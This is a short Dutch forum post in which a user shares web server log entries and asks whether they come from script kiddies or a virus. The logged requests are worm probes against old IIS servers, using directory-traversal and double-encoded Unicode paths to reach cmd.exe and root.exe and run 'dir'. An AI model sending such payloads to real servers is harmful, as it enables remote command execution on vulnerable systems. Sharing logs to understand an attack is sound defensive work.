hee mensen, ik keek laatst eens voor de gein in m'n logfiles, en zag dat er dit soort requests in stonden:
zijn dit script kiddo's die op zoek zijn naar beveiligingslekken? of is dit een of ander virus ofzo?
of is dit een 'normale' m$-feature? (meldingen komen voornamelijk vanuit mijn eigen netwerk van Chello)
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 24.132.110.144 - - [20/Oct/2001:18:36:33 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 24.132.110.144 - - [20/Oct/2001:18:36:34 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd. exe?/c+dir HTTP/1.0" 404 340 24.132.110.144 - - [20/Oct/2001:18:36:34 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 24.132.110.144 - - [20/Oct/2001:18:36:34 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 24.132.110.144 - - [20/Oct/2001:18:36:34 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 24.132.110.144 - - [20/Oct/2001:18:36:34 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 24.132.110.144 - - [20/Oct/2001:18:36:37 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 24.132.110.144 - - [20/Oct/2001:18:36:37 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 24.132.110.144 - - [20/Oct/2001:18:36:37 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 24.132.110.144 - - [20/Oct/2001:18:36:37 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 |
zijn dit script kiddo's die op zoek zijn naar beveiligingslekken? of is dit een of ander virus ofzo?
"Light thinks it travels faster than anything. It doesn't. For wherever light travels it finds darkness has got there first and is waiting for it."